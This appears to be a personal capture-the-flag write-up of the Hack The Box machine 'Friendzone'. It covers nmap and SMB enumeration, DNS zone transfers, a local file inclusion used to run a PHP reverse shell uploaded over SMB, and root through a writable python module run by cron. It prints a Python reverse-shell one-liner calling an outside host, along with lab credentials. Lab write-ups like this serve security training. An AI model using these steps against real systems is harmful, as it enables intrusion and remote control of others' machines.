HTB Friendzone #22

Nmap Result: 

Not shown: 993 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-02-22T05:02:00+02:00
| smb2-time: 
|   date: 2022-02-22T03:02:00
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

21 enum:

53: zone?

SMb enum:

80 enum:

SMB Enum:

smbmap -H 10.129.1.225

Looks like we can read from general and Development.

smbmap -H 10.129.1.225 -R --depth 5

Running this will go in those directories and discover files.

smbclient //10.129.1.225/general

and download the file (get creds.txt)

creds.txt content

admin:WORKWORKHhallelujah@#

----

HTTPs

/js/js

It's executing php code.

---

Let's try some zone transfer!

dig axfr @10.129.1.225 friendzone.red > zonetransfer

Now we've got more hosts:

now do the other host:

dig axfr @10.129.1.225 friendzoneportal.red >> zonetransfer

cat zonetransfer| grep friendzone | grep IN | awk '{print $1}'| sed 's/\.$//g'|sort -u

Command Explanation:

  • we are grepping the lines with the keywords "friendzone and IN"

  • awk is just printing up until the first space

  • sed 's/\.$//g' is replacing the ending period with nothing inside // has nothing. you place the first value in side the first "//" of what you want to replace and put something in the second one that you want to replace it with.

  • Syntax: sed 's/value1/value2/g'

now we've got more hosts

Used gedit to formatted the host names to https://hostname

Now use aquatone to see which hosts have actual content in a timely manner.

To use aquatone, you need to place the text file inside the same directory ---- /opt/aquatone

Interesting urls: 

 https://administrator1.friendzone.red login portal
 https://admin.friendzoneportal.red : login portal
https://uploads.friendzone.red

We can also see the analysis by visiting the output html with firefox:

uploads.friendzone.red

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

We could try to upload a file in the development directory through SMB and execute it with LFI here?

test php 

<?php 
echo("Gorigorisensei Hacking your System.") ;
?>

Now it's uploaded it on Development.

Visiting the following link, we confirm, that it's working.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

Adjusted the script with the php reverse shell.

https://github.com/pentestmonkey/php-reverse-shell

Now we have a shell.

User credential found:

Agpyu12!0.213$

switched user.

root owned file found

Can't edit though.. .

This is running just the os module as a cron job.

Let's do LinPeas.

Writable file found: and it's an os file! If we edit this,it will be ran by the reporter python script!

Replaced the content with the reverse shell (removed os function)

This wasn't working so I used triple quotes around the code but this didn't work either

I used this instead:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I'm defnitely getting better at vi...but still not great at it:

vim commands I used today:

dd - erase a line

u - undo

i - insert

PreviousHelp #23 SQL injection, eBPF priv esc (Linux)NextHTB Netmon #21 (Windows)

Last updated